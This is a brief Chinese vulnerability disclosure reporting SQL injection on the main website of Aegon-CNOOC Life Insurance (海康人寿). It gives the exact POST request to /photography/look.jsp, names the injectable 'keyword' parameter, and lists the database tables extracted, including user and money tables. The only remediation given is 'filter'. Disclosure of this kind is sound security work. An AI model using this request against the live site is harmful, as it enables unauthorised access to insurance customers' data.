海康人寿主站SQL注射漏洞

海康人寿主站SQL注射SQL注入漏洞

POST /photography/look.jsp HTTP/1.1
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Referer: http://www.aegon-cnooc.com.cn:80/
Cookie: JSESSIONID=3BE229551343BCD8E7853360EED83F51
Host: www.aegon-cnooc.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

keytype=1&keyword=1

注射参数keyword

Database: children

[11 tables]

+---------------------------------------+

| aoyun_user |

| gold_info_in |

| gold_info_out |

| inoldperson_user |

| money_user |

| oldperson_user |

| photography_user |

| question_answer |

| shandong_user |

| user |

| user_liuyan |

+---------------------------------------+



Database: information_schema

[16 tables]

+---------------------------------------+

| CHARACTER_SETS |

| COLLATIONS |

| COLLATION_CHARACTER_SET_APPLICABILITY |

| COLUMNS |

| COLUMN_PRIVILEGES |

| KEY_COLUMN_USAGE |

| ROUTINES |

| SCHEMATA |

| SCHEMA_PRIVILEGES |

| STATISTICS |

| TABLES |

| TABLE_CONSTRAINTS |

| TABLE_PRIVILEGES |

| TRIGGERS |

| USER_PRIVILEGES |

| VIEWS |

+---------------------------------------+

解决方案：
过滤